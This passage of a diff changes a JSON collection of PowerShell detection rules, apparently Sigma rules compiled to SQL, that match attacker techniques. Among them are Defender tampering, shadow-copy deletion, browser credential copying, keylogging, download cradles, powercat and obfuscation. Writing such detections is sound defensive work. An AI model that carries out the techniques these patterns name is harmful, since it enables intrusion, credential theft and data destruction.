'%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ScriptBlockText LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-GPO%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_rundll.yml" + "filename": "posh_ps_susp_get_gpo.yml" }, { - "title": "Suspicious Unblock-File", - "id": "5947497f-1aa4-41dd-9693-c9848d58727d", + "title": "Powershell Timestomp", + "id": "c6438007-e081-42ce-9483-b067fbef33c3", "status": "test", - "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1553.005" + "attack.t1070.006" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Unblock-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.CreationTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastWriteTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastAccessTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetCreationTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastAccessTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastWriteTime%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_unblock_file.yml" + "filename": "posh_ps_timestomp.yml" }, { - "title": "Potential PowerShell Obfuscation Using Character Join", - "id": "e8314f79-564d-4f79-bc13-fbc0bf2660d8", + "title": "Windows Screen Capture with CopyFromScreen", + "id": "d4a11f63-2390-411c-9adf-d791fd152830", "status": "experimental", - "description": "Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1027", - "attack.t1059.001" + "attack.collection", + "attack.t1113" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%-Alias%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Value (-join(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%.CopyFromScreen%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_alias_obfscuation.yml" + "filename": "posh_ps_capture_screenshots.yml" }, { - "title": "Powershell Token Obfuscation - Powershell", - "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "title": "Tamper Windows Defender - PSClassic", + "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027.009" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_token_obfuscation.yml" + "filename": "posh_pc_tamper_with_windows_defender.yml" }, { - "title": "Suspicious Export-PfxCertificate", - "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", + "id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", "status": "test", - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "author": "Florian Roth (Nextron Systems)", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (HostApplication LIKE '%-ModuleName %' ESCAPE '\\' OR HostApplication LIKE '%-ModulePath %' ESCAPE '\\' OR HostApplication LIKE '%-ScriptBlock %' ESCAPE '\\' OR HostApplication LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_export_pfxcertificate.yml" + "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - PsScript", - "id": "91e69562-2426-42ce-a647-711b8152ced6", - "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "title": "Use Get-NetTCPConnection", + "id": "b366adb4-d63d-422d-8a2c-186463b5ded0", + "status": "test", + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.reconnaissance", "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.t1049" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-NetTCPConnection%' ESCAPE '\\')" ], - "filename": "posh_ps_aadinternals_cmdlets_execution.yml" + "filename": "posh_pc_susp_get_nettcpconnection.yml" }, { - "title": "Access to Browser Login Data", - "id": "fc028194-969d-4122-8abe-0470d5b8f12f", + "title": "Remote PowerShell Session (PS Classic)", + "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", "status": "test", - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", - "author": "frack113", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Unknown" + "Legitimate use remote PowerShell sessions" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Opera Software\\\\Opera Stable\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\Default%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data For Account%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" ], - "filename": "posh_ps_access_to_browser_login_data.yml" + "filename": "posh_pc_remote_powershell_session.yml" }, { - "title": "Potential Keylogger Activity", - "id": "965e2db9-eddb-4cf6-a986-7a967df651e4", - "status": "experimental", - "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", + "id": "71ff406e-b633-4989-96ec-bc49d825a412", + "status": "test", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ "attack.collection", - "attack.credential_access", - "attack.t1056.001" + "attack.t1074.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Compress-Archive %' ESCAPE '\\' AND HostApplication LIKE '% -Path %' ESCAPE '\\' AND HostApplication LIKE '% -DestinationPath %' ESCAPE '\\' AND HostApplication LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_keylogger_activity.yml" + "filename": "posh_pc_susp_zip_compress.yml" }, { - "title": "Execution via CL_Mutexverifiers.ps1", - "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", - "status": "test", - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "PowerShell Downgrade Attack - PowerShell", + "id": "6331d09b-4785-4c13-980f-f96661356249", + "status": "experimental", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND EngineVersion LIKE '2.%' ESCAPE '\\' AND NOT (HostVersion LIKE '2.%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" + "filename": "posh_pc_downgrade_attack.yml" }, { - "title": "Windows Screen Capture with CopyFromScreen", - "id": "d4a11f63-2390-411c-9adf-d791fd152830", + "title": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", + "id": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", "status": "experimental", - "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", - "author": "frack113", + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", "tags": [ - "attack.collection", - "attack.t1113" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%.CopyFromScreen%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ConsoleHost' AND (HostApplication LIKE '%bxor%' ESCAPE '\\' OR HostApplication LIKE '%join%' ESCAPE '\\' OR HostApplication LIKE '%char%' ESCAPE '\\'))" ], - "filename": "posh_ps_capture_screenshots.yml" + "filename": "posh_pc_xor_commandline.yml" }, { - "title": "Import PowerShell Modules From Suspicious Directories", - "id": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", - "status": "experimental", - "description": "Detects powershell scripts that import modules from suspicious directories", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell Called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "status": "test", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" ], - "filename": "posh_ps_import_module_susp_dirs.yml" + "filename": "posh_pc_exe_calling_ps.yml" }, { - "title": "Powershell Execute Batch Script", - "id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", + "title": "Renamed Powershell Under Powershell Channel", + "id": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", "status": "test", - "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", - "author": "frack113", + "description": "Detects renamed powershell", + "author": "Harish Segar, frack113", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administration script" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.cmd%' ESCAPE '\\' OR ScriptBlockText LIKE '%.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostName = 'ConsoleHost' AND NOT ((HostApplication LIKE 'powershell.exe%' ESCAPE '\\' OR HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_execute_batch_script.yml" + "filename": "posh_pc_renamed_powershell.yml" }, { - "title": "Powershell Add Name Resolution Policy Table Rule", - "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "title": "Suspicious Non PowerShell WSMAN COM Provider", + "id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", "status": "test", - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "author": "Borna Talebi", + "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.impact", - "attack.t1565" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND ProviderName = 'WSMan' AND NOT (HostApplication LIKE '%powershell%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_dnsclient_rule.yml" + "filename": "posh_pc_wsman_com_provider_no_powershell.yml" }, { - "title": "Active Directory Group Enumeration With Get-AdGroup", - "id": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", - "status": "experimental", - "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", + "title": "Delete Volume Shadow Copies Via WMI With PowerShell", + "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1069.002" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdGroup %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_adgroup.yml" + "filename": "posh_pc_delete_volume_shadow_copies.yml" }, { - "title": "Service Registry Permissions Weakness Check", - "id": "95afc12e-3cbb-40c3-9340-84a032e596a3", + "title": "Netcat The Powershell Version", + "id": "c5b20776-639a-49bf-94c7-84f912b91c15", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1574.011" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-acl%' ESCAPE '\\' AND ScriptBlockText LIKE '%REGISTRY::HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (HostApplication LIKE '%powercat %' ESCAPE '\\' OR HostApplication LIKE '%powercat.ps1%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_acl_service.yml" + "filename": "posh_pc_powercat.yml" }, { - "title": "Use Remove-Item to Delete File", - "id": "b8af5f36-1361-4ebe-9e76-e36128d947bf", - "status": "test", - "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", - "author": "frack113", + "title": "Nslookup PowerShell Download Cradle", + "id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "status": "experimental", + "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", + "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '%HKCU:\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%HKLM:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%powershell%' ESCAPE '\\' AND HostApplication LIKE '%nslookup%' ESCAPE '\\' AND (HostApplication LIKE '%-q=txt%' ESCAPE '\\' OR HostApplication LIKE '%-querytype=txt%' ESCAPE '\\'))" ], - "filename": "posh_ps_remove_item_path.yml" + "filename": "posh_pc_abuse_nslookup_with_dns_records.yml" }, { - "title": "Active Directory Computers Enumeration with Get-AdComputer", - "id": "36bed6b2-e9a0-4fff-beeb-413a92b86138", + "title": "Suspicious PowerShell Download", + "id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", "status": "experimental", - "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.", - "author": "frack113", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "PowerShell scripts that download content from the Internet" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Net.WebClient%' ESCAPE '\\' AND (HostApplication LIKE '%.DownloadFile(%' ESCAPE '\\' OR HostApplication LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_adcomputer.yml" + "filename": "posh_pc_susp_download.yml" }, { - "title": "Malicious PowerShell Commandlets - ScriptBlock", - "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "title": "Alternate PowerShell Hosts", + "id": "d7326048-328b-4d5e-98af-86e84b17c765", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - 